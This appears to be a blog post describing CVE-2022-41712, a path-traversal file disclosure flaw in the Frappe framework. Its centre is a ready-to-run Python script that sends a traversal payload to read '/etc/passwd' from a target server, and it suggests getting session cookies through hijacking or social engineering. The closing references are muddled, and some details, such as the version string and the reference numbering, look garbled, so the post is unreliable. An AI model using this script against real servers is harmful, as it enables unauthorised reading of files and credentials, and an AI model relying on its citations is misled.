CVE-2022-41712: Frappe v14.10. Remote Arbitrary File Disclosure Exploit

In this post, we will be discussing a critical vulnerability, CVE-2022-41712, affecting Frappe v14.10.. This vulnerability allows an external attacker to remotely obtain arbitrary local files by exploiting insufficient validation of user-provided information in the import_file parameter.

We will provide a detailed analysis of the exploit, background on Frappe, and a code snippet demonstrating the vulnerability, as well as links to the original references and past vulnerabilities.

Background

Frappe is a full-stack web application framework based on Python and JavaScript, used to build scalable, reliable, and maintainable web applications. A popular use case is building Enterprise Resource Planning (ERP) software, and the most well-known ERP built on Frappe is ERPNext.

The Exploit

This vulnerability exists in Frappe v14.10. due to improper validation of user input in the import_file parameter. An attacker can exploit this to obtain arbitrary local files remotely.

Original Reference

[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41712
[2] https://github.com/frappe/frappe/security/advisories/GHSA-22gp-q49m-5jf5

Here's a Python code snippet to execute the exploit

import requests

target_url = "https://<TARGET>/api/method/frappe.desk.page.setup_wizard.setup_wizard.import_file";
file_to_upload = "/etc/passwd"
session_cookie = "session_id=<INSERT_YOUR_SESSION_ID>"

headers = {
    "Cookie": session_cookie
}

data = {
    "import_file": "../../../../../../.." + file_to_upload
}

response = requests.post(target_url, data=data, headers=headers)

if response.status_code == 200:
    print("Exploit successful!")
    print(response.json())
else:
    print("Exploit failed. Status code: " + str(response.status_code))

Replace <TARGET> with the target URL and <INSERT_YOUR_SESSION_ID> with a valid session_id value.

Exploit Details

To execute the attack, the hacker sends a malicious POST request to the target URL, crafted to include the desired file to be leaked. The "../" sequence in the file path allows the attacker to traverse the directory structure and access arbitrary files on the server, such as "/etc/passwd".

To perform this exploit, an attacker needs to obtain an active session_id value. This may be accomplished through various methods, such as session hijacking or social engineering.

Mitigations

The vulnerability was reported and disclosed responsibly, which allowed the development team to address it promptly. Users are advised to update their Frappe installations to the latest version, which contains a patch for this vulnerability.

Conclusion

CVE-2022-41712 is a critical remote file disclosure vulnerability in Frappe v14.10. that allows an attacker to leak arbitrary local files on the server. Developers relying on Frappe and users alike should take this vulnerability seriously and update their installations to the latest version to mitigate the risk.

CVE-2021-23371: Remote code execution in Frappe v12.11. [4]

[3] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23416
[4] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23371

Timeline

Published on: 11/25/2022 18:15:00 UTC
Last modified on: 11/30/2022 16:01:00 UTC